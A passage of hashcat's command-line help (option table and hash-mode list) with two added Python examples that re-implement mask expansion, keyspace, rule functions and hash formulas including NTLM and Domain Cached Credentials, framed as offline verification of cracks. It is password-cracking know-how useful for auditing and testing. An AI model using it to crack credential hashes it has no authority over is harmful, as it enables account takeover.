     --veracrypt-pim-start      | Num  | VeraCrypt personal iterations multiplier start       | --veracrypt-pim-start=450
     --veracrypt-pim-stop       | Num  | VeraCrypt personal iterations multiplier stop        | --veracrypt-pim-stop=500
 -b, --benchmark                |      | Run benchmark of selected hash-modes                 |
     --benchmark-all            |      | Run benchmark of all hash-modes (requires -b)        |
     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db
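
Added example, not hashcat's own code: a small re-implementation in Python of the candidate-side options listed above (custom charsets -1..-4, --increment-min/--increment-max, the candidate count behind --keyspace, -s/-l, and a subset of the rule language that -j, -k and -r apply), so their semantics can be checked offline before a long run. The candidate ordering and the subset of rule functions implemented here are assumptions of this example; hashcat --stdout is the ground truth for any real build.

```python
# Added example, not hashcat's code: mask expansion, keyspace, skip/limit,
# increment and a subset of the rule language, re-implemented so the option
# semantics above can be checked offline.  Candidate ordering and the rule
# subset are assumptions of this example.
import math
import string

# ?s is the space plus every ASCII punctuation character; ?a is the union.
BUILTIN = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
           "d": string.digits, "s": " " + string.punctuation}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]

def expand_charset(spec, custom):
    """'?l?d', 'abc?1', '??' -> de-duplicated string of characters."""
    out, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            out.extend("?" if key == "?" else custom[key] if key in custom else BUILTIN[key])
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return "".join(dict.fromkeys(out))  # duplicates would inflate the count

def parse_mask(mask, custom=None):
    """One charset per mask position.  custom maps '1'..'4' (the -1..-4
    options) to specs; sets are expanded in order, so -2 may reference ?1."""
    sets = {}
    for k in sorted(custom or {}):
        sets[k] = expand_charset(custom[k], sets)
    positions, i = [], 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        positions.append(expand_charset(mask[i:i + step], sets))
        i += step
    return positions

def keyspace(positions):
    """Total number of candidates the mask produces."""
    return math.prod(len(s) for s in positions)

def candidates(positions, skip=0, limit=None):
    """Yield candidates skip .. skip+limit-1 (-s / -l); the leftmost position
    varies fastest, an ordering this example assumes."""
    stop = keyspace(positions) if limit is None else min(keyspace(positions), skip + limit)
    for idx in range(skip, stop):
        word, rem = [], idx
        for s in positions:
            rem, r = divmod(rem, len(s))
            word.append(s[r])
        yield "".join(word)

def increment_masks(mask, inc_min, inc_max):
    """--increment: the masks actually run, from inc_min to inc_max tokens."""
    tokens, i = [], 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        tokens.append(mask[i:i + step])
        i += step
    return ["".join(tokens[:n]) for n in range(inc_min, min(inc_max, len(tokens)) + 1)]

def _pos(ch):
    """Rule positions are 0-9, then A-Z for 10-35."""
    return int(ch) if ch.isdigit() else ord(ch.upper()) - ord("A") + 10

# (argument count, transform) for a subset of the rule functions
RULES = {
    ":": (0, lambda w, a: w),
    "l": (0, lambda w, a: w.lower()),
    "u": (0, lambda w, a: w.upper()),
    "c": (0, lambda w, a: w[:1].upper() + w[1:].lower()),
    "t": (0, lambda w, a: w.swapcase()),
    "r": (0, lambda w, a: w[::-1]),
    "d": (0, lambda w, a: w * 2),
    "[": (0, lambda w, a: w[1:]),
    "]": (0, lambda w, a: w[:-1]),
    "$": (1, lambda w, a: w + a),
    "^": (1, lambda w, a: a + w),
    "@": (1, lambda w, a: w.replace(a, "")),
    "T": (1, lambda w, a: w[:_pos(a)] + w[_pos(a):_pos(a) + 1].swapcase() + w[_pos(a) + 1:]),
    "D": (1, lambda w, a: w[:_pos(a)] + w[_pos(a) + 1:]),
    "s": (2, lambda w, a: w.replace(a[0], a[1])),
    "x": (2, lambda w, a: w[_pos(a[0]):_pos(a[0]) + _pos(a[1])]),
}

def apply_rule(rule, word):
    """Apply one rule line (functions, optionally space-separated) to word."""
    w, i = word, 0
    while i < len(rule):
        if rule[i] == " ":
            i += 1
            continue
        argc, fn = RULES[rule[i]]
        w = fn(w, rule[i + 1:i + 1 + argc])
        i += 1 + argc
    return w

def combine(left, right, rule_left=":", rule_right=":"):
    """-a 1 with -j/-k: rule_left on the left word, rule_right on the right."""
    return apply_rule(rule_left, left) + apply_rule(rule_right, right)
```

keyspace() returns the full product of the charset sizes, and candidates() counts single words for -s/-l. hashcat's own --keyspace prints a smaller figure for mask attacks, because the part of the mask iterated on the device is factored out, and its -s/-l count in that unit, so do not feed the numbers from this example straight into a distributed split without checking --keyspace first. combine("hello", "world", "c", "^-") reproduces the -j 'c' -k '^-' pair from the table: "Hello-world".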
 
- [ Hash modes ] -
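
The table below describes each mode as a formula over $pass and $salt. What follows is an added example, not hashcat's code: those formulas implemented in Python for a few of the listed modes, with the NTLM (1000) and Domain Cached Credentials (1100, 2100) chains written out, so that a known-answer hash can be generated and a crack verified before pointing hashcat at real material. MD4 is written out in full because hashlib's MD4 is an OpenSSL legacy algorithm that is often unavailable. The hash-line formats used here (hash:salt, hash:user, $DCC2$10240#user#hash) follow hashcat's conventions as I know them and should be confirmed with --hash-info for the mode in question.

```python
# Added example, not hashcat's code: a few of the $pass/$salt formulas from
# the hash-mode table, plus NTLM and DCC/DCC2, implemented so a known-answer
# hash can be produced and a crack checked offline.  Line formats are
# hashcat's conventions as I know them; confirm with --hash-info.
import hashlib
import struct

def md4(data):
    """RFC 1320 MD4 (needed for NTLM and the DCC modes)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = [  # (mix function, constant, shifts, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    ]
    # pad: 0x80, zeros to 56 mod 64, then the bit length as little-endian u64
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def ntlm(password):
    """Mode 1000: MD4(utf16le($pass))."""
    return md4(password.encode("utf-16-le"))

def dcc(password, user):
    """Mode 1100: MD4(NTLM . utf16le(lower($user)))."""
    return md4(ntlm(password) + user.lower().encode("utf-16-le"))

def dcc2(password, user, iterations=10240):
    """Mode 2100: PBKDF2-HMAC-SHA1(DCC, utf16le(lower($user)), iterations, 16 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", dcc(password, user),
                               user.lower().encode("utf-16-le"), iterations, 16)

HEX = lambda d: d.hexdigest().encode()  # nested modes hash the inner hex string
# generic modes: mode -> (digest of (password str, salt bytes), salted?)
GENERIC = {
    0:    (lambda p, s: hashlib.md5(p.encode()).digest(), False),            # md5($pass)
    10:   (lambda p, s: hashlib.md5(p.encode() + s).digest(), True),         # md5($pass.$salt)
    20:   (lambda p, s: hashlib.md5(s + p.encode()).digest(), True),         # md5($salt.$pass)
    70:   (lambda p, s: hashlib.md5(p.encode("utf-16-le")).digest(), False), # md5(utf16le($pass))
    110:  (lambda p, s: hashlib.sha1(p.encode() + s).digest(), True),        # sha1($pass.$salt)
    1400: (lambda p, s: hashlib.sha256(p.encode()).digest(), False),         # SHA2-256
    2600: (lambda p, s: hashlib.md5(HEX(hashlib.md5(p.encode()))).digest(), False),   # md5(md5($pass))
    4400: (lambda p, s: hashlib.md5(HEX(hashlib.sha1(p.encode()))).digest(), False),  # md5(sha1($pass))
}

def hash_line(mode, password, salt=b"", user=""):
    """The line hashcat expects: hash[:salt] for the generic modes, hash:user
    for 1100 and $DCC2$<iterations>#user#hash for 2100."""
    if mode == 1000:
        return ntlm(password).hex()
    if mode == 1100:
        return f"{dcc(password, user).hex()}:{user}"
    if mode == 2100:
        return f"$DCC2$10240#{user}#{dcc2(password, user).hex()}"
    fn, salted = GENERIC[mode]
    digest = fn(password, salt).hex()
    return f"{digest}:{salt.decode()}" if salted else digest

def matches(mode, line, candidate):
    """True when candidate reproduces line under mode, i.e. a crack."""
    if mode == 1100:
        user = line.split(":", 1)[1]
        return hash_line(mode, candidate, user=user) == line
    if mode == 2100:
        user = line.split("#")[1]
        return hash_line(mode, candidate, user=user) == line
    salt = line.split(":", 1)[1].encode() if ":" in line else b""
    return hash_line(mode, candidate, salt) == line
```

A quick self-check before a real run: write hash_line(1000, "password") to a file and crack it with -m 1000 against a wordlist that contains the word; if the rig does not recover it within seconds the problem is the setup, not the hash. Note that the nested modes such as 2600 md5(md5($pass)) hash the lowercase hex of the inner digest rather than its raw bytes, and that the DCC modes lowercase the username before encoding it, both easy to get wrong when reproducing the table's formulas by hand.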
 
      # | Name                                                | Category
  ======+=====================================================+======================================
    900 | MD4                                                 | Raw Hash
      0 | MD5                                                 | Raw Hash
    100 | SHA1                                                | Raw Hash
   1300 | SHA2-224                                            | Raw Hash
   1400 | SHA2-256                                            | Raw Hash
  10800 | SHA2-384                                            | Raw Hash
   1700 | SHA2-512                                            | Raw Hash
  17300 | SHA3-224                                            | Raw Hash
  17400 | SHA3-256                                            | Raw Hash
  17500 | SHA3-384                                            | Raw Hash
  17600 | SHA3-512                                            | Raw Hash
   6000 | RIPEMD-160                                          | Raw Hash
    600 | BLAKE2b-512                                         | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian    | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian    | Raw Hash
   6900 | GOST R 34.11-94                                     | Raw Hash
   5100 | Half MD5                                            | Raw Hash
  17700 | Keccak-224                                          | Raw Hash
  17800 | Keccak-256                                          | Raw Hash
  17900 | Keccak-384                                          | Raw Hash
  18000 | Keccak-512                                          | Raw Hash
   6100 | Whirlpool                                           | Raw Hash
  10100 | SipHash                                             | Raw Hash
     70 | md5(utf16le($pass))                                 | Raw Hash
    170 | sha1(utf16le($pass))                                | Raw Hash
   1470 | sha256(utf16le($pass))                              | Raw Hash
  10870 | sha384(utf16le($pass))                              | Raw Hash
   1770 | sha512(utf16le($pass))                              | Raw Hash
     10 | md5($pass.$salt)                                    | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                    | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                              | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                               | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                         | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                         | Raw Hash, Salted and/or Iterated
  21300 | md5($salt.sha1($salt.$pass))                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                           | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                     | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                          | Raw Hash, Salted and/or Iterated
   3500 | md5(md5(md5($pass)))                                | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                    | Raw Hash, Salted and/or Iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))             | Raw Hash, Salted and/or Iterated
  21200 | md5(sha1($salt).md5($pass))                         | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                         | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                           | Raw Hash, Salted and/or Iterated
    110 | sha1($pass.$salt)                                   | Raw Hash, Salted and/or Iterated
    120 | sha1($salt.$pass)                                   | Raw Hash, Salted and/or Iterated
   4900 | sha1($salt.$pass.$salt)                             | Raw Hash, Salted and/or Iterated
   4520 | sha1($salt.sha1($pass))                             | Raw Hash, Salted and/or Iterated
  24300 | sha1($salt.sha1($pass.$salt))                       | Raw Hash, Salted and/or Iterated
    140 | sha1($salt.utf16le($pass))                          | Raw Hash, Salted and/or Iterated
  19300 | sha1($salt1.$pass.$salt2)                           | Raw Hash, Salted and/or Iterated
  14400 | sha1(CX)                                            | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                    | Raw Hash, Salted and/or Iterated
   4710 | sha1(md5($pass).$salt)                              | Raw Hash, Salted and/or Iterated
  21100 | sha1(md5($pass.$salt))                              | Raw Hash, Salted and/or Iterated
  18500 | sha1(md5(md5($pass)))                               | Raw Hash, Salted and/or Iterated
   4500 | sha1(sha1($pass))                                   | Raw Hash, Salted and/or Iterated
   4510 | sha1(sha1($pass).$salt)                             | Raw Hash, Salted and/or Iterated
   5000 | sha1(sha1($salt.$pass.$salt))                       | Raw Hash, Salted and/or Iterated
    130 | sha1(utf16le($pass).$salt)                          | Raw Hash, Salted and/or Iterated
   1410 | sha256($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1420 | sha256($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  22300 | sha256($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
  20720 | sha256($salt.sha256($pass))                         | Raw Hash, Salted and/or Iterated
   1440 | sha256($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  20800 | sha256(md5($pass))                                  | Raw Hash, Salted and/or Iterated
  20710 | sha256(sha256($pass).$salt)                         | Raw Hash, Salted and/or Iterated
  21400 | sha256(sha256_bin($pass))                           | Raw Hash, Salted and/or Iterated
   1430 | sha256(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
  10810 | sha384($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
  10820 | sha384($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  10840 | sha384($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  10830 | sha384(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
   1710 | sha512($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1720 | sha512($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
   1740 | sha512($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   1730 | sha512(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     50 | HMAC-MD5 (key = $pass)                              | Raw Hash, Authenticated
     60 | HMAC-MD5 (key = $salt)                              | Raw Hash, Authenticated
    150 | HMAC-SHA1 (key = $pass)                             | Raw Hash, Authenticated
    160 | HMAC-SHA1 (key = $salt)                             | Raw Hash, Authenticated
   1450 | HMAC-SHA256 (key = $pass)                           | Raw Hash, Authenticated
   1460 | HMAC-SHA256 (key = $salt)                           | Raw Hash, Authenticated
   1750 | HMAC-SHA512 (key = $pass)                           | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                           | Raw Hash, Authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian         | Raw Hash, Authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian         | Raw Hash, Authenticated
  11850 | HMAC-Streebog-512 (key = $pass), big-endian         | Raw Hash, Authenticated
  11860 | HMAC-Streebog-512 (key = $salt), big-endian         | Raw Hash, Authenticated
  11500 | CRC32                                               | Raw Checksum
  18700 | Java Object hashCode()                              | Raw Checksum
  25700 | MurmurHash                                          | Raw Checksum
  14100 | 3DES (PT = $salt, key = $pass)                      | Raw Cipher, Known-Plaintext attack
  14000 | DES (PT = $salt, key = $pass)                       | Raw Cipher, Known-Plaintext attack
  26401 | AES-128-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26402 | AES-192-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26403 | AES-256-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  15400 | ChaCha20                                            | Raw Cipher, Known-Plaintext attack
  14500 | Linux Kernel Crypto API (2.4)                       | Raw Cipher, Known-Plaintext attack
  14900 | Skip32 (PT = $salt, key = $pass)                    | Raw Cipher, Known-Plaintext attack
  11900 | PBKDF2-HMAC-MD5                                     | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                    | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                  | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                  | Generic KDF
   8900 | scrypt                                              | Generic KDF
    400 | phpass                                              | Generic KDF
  16100 | TACACS+                                             | Network Protocols
  11400 | SIP digest authentication (MD5)                     | Network Protocols
   5300 | IKE-PSK MD5                                         | Network Protocols
   5400 | IKE-PSK SHA1                                        | Network Protocols
  25100 | SNMPv3 HMAC-MD5-96                                  | Network Protocols
  25000 | SNMPv3 HMAC-MD5-96/HMAC-SHA1-96                     | Network Protocols
  25200 | SNMPv3 HMAC-SHA1-96                                 | Network Protocols
  26700 | SNMPv3 HMAC-SHA224-128                              | Network Protocols
  26800 | SNMPv3 HMAC-SHA256-192                              | Network Protocols
  26900 | SNMPv3 HMAC-SHA384-256                              | Network Protocols
  27300 | SNMPv3 HMAC-SHA512-384                              | Network Protocols
   2500 | WPA-EAPOL-PBKDF2                                    | Network Protocols
   2501 | WPA-EAPOL-PMK                                       | Network Protocols
  22000 | WPA-PBKDF2-PMKID+EAPOL                              | Network Protocols
  22001 | WPA-PMK-PMKID+EAPOL                                 | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                    | Network Protocols
  16801 | WPA-PMKID-PMK                                       | Network Protocols
   7300 | IPMI2 RAKP HMAC-SHA1                                | Network Protocols
  10200 | CRAM-MD5                                            | Network Protocols
  16500 | JWT (JSON Web Token)                                | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocols
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocols
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocols
   5600 | NetNTLMv2                                           | Network Protocols
  27100 | NetNTLMv2 (NT)                                      | Network Protocols
   4800 | iSCSI CHAP authentication, MD5(CHAP)                | Network Protocols
   8500 | RACF                                                | Operating System
   6300 | AIX {smd5}                                          | Operating System
   6700 | AIX {ssha1}                                         | Operating System
   6400 | AIX {ssha256}                                       | Operating System
   6500 | AIX {ssha512}                                       | Operating System
   3000 | LM                                                  | Operating System
  19000 | QNX /etc/shadow (MD5)                               | Operating System
  19100 | QNX /etc/shadow (SHA256)                            | Operating System
  19200 | QNX /etc/shadow (SHA512)                            | Operating System
  15300 | DPAPI masterkey file v1                             | Operating System
  15900 | DPAPI masterkey file v2                             | Operating System
   7200 | GRUB 2                                              | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                     | Operating System
  12400 | BSDi Crypt, Extended DES                            | Operating System
   1000 | NTLM                                                | Operating System
   9900 | Radmin2                                             | Operating System
   5800 | Samsung Android Password/PIN                        | Operating System
  13800 | Windows Phone 8+ PIN/password                       | Operating System
   2410 | Cisco-ASA MD5                                       | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                       | Operating System
   9300 | Cisco-IOS $9$ (scrypt)                              | Operating System
   5700 | Cisco-IOS type 4 (SHA256)                           | Operating System
   2400 | Cisco-PIX MD5                                       | Operating System
   8100 | Citrix NetScaler (SHA1)                             | Operating System
  22200 | Citrix NetScaler (SHA512)                           | Operating System
   1100 | Domain Cached Credentials (DCC), MS Cache           | Operating System
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2      | Operating System
   7000 | FortiGate (FortiOS)                                 | Operating System
  26300 | FortiGate256 (FortiOS256)                           | Operating System
    125 | ArubaOS                                             | Operating System
    501 | Juniper IVE                                         | Operating System
     22 | Juniper NetScreen/SSG (ScreenOS)                    | Operating System
  15100 | Juniper/NetBSD sha1crypt                            | Operating System
  26500 | iPhone passcode (UID key + System Keybag)           | Operating System
    122 | macOS v10.4, macOS v10.5, macOS v10.6               | Operating System
   1722 | macOS v10.7                                         | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                        | Operating System
   3200 | bcrypt $2*$, Blowfish (Unix)                        | Operating System
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)           | Operating System
   1500 | descrypt, DES (Unix), Traditional DES               | Operating System
   7400 | sha256crypt $5$, SHA256 (Unix)                      | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                      | Operating System
  24600 | SQLCipher                                           | Database Server
    131 | MSSQL (2000)                                        | Database Server
    132 | MSSQL (2005)                                        | Database Server
   1731 | MSSQL (2012, 2014)                                  | Database Server
  24100 | MongoDB ServerKey SCRAM-SHA-1                       | Database Server
  24200 | MongoDB ServerKey SCRAM-SHA-256                     | Database Server
     12 | PostgreSQL                                          | Database Server
  11100 | PostgreSQL CRAM (MD5)                               | Database Server
   3100 | Oracle H: Type (Oracle 7+)                          | Database Server
    112 | Oracle S: Type (Oracle 11+)                         | Database Server
  12300 | Oracle T: Type (Oracle 12+)                         | Database Server
   7401 | MySQL $A$ (sha256crypt)                             | Database Server
  11200 | MySQL CRAM (SHA1)                                   | Database Server
    200 | MySQL323                                            | Database Server
    300 | MySQL4.1/MySQL5                                     | Database Server
   8000 | Sybase ASE                                          | Database Server
   8300 | DNSSEC (NSEC3)                                      | FTP, HTTP, SMTP, LDAP Server
  25900 | KNX IP Secure - Device Authentication Code          | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                    | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256(Base64), LDAP {SSHA256}                    | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                    | FTP, HTTP, SMTP, LDAP Server
  24900 | Dahua Authentication MD5                            | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)             | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server >= 0.9.55                          | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                      | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)               | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x < .NET 4                              | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x >= .NET 4                             | FTP, HTTP, SMTP, LDAP Server
   1421 | hMailServer                                         | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA            | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B (BCODE)                                 | Enterprise Application Software (EAS)
   7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE             | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                            | Enterprise Application Software (EAS)
   7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE        | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1                 | Enterprise Application Software (EAS)
    133 | PeopleSoft                                          | Enterprise Application Software (EAS)
  13500 | PeopleSoft PS_TOKEN                                 | Enterprise Application Software (EAS)
  21500 | SolarWinds Orion                                    | Enterprise Application Software (EAS)
  21501 | SolarWinds Orion v2                                 | Enterprise Application Software (EAS)
     24 | SolarWinds Serv-U                                   | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                                | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                                | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                                | Enterprise Application Software (EAS)
  26200 | OpenEdge Progress Encode                            | Enterprise Application Software (EAS)
  20600 | Oracle Transportation Management (SHA256)           | Enterprise Application Software (EAS)
   4711 | Huawei sha1(md5($pass).$salt)                       | Enterprise Application Software (EAS)
  20711 | AuthMe sha256                                       | Enterprise Application Software (EAS)
  22400 | AES Crypt (SHA256)                                  | Full-Disk Encryption (FDE)
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)         | Full-Disk Encryption (FDE)
  14600 | LUKS                                                | Full-Disk Encryption (FDE)
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
  13751 | VeraCrypt SHA256 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13752 | VeraCrypt SHA256 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13753 | VeraCrypt SHA256 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode          | Full-Disk Encryption (FDE)
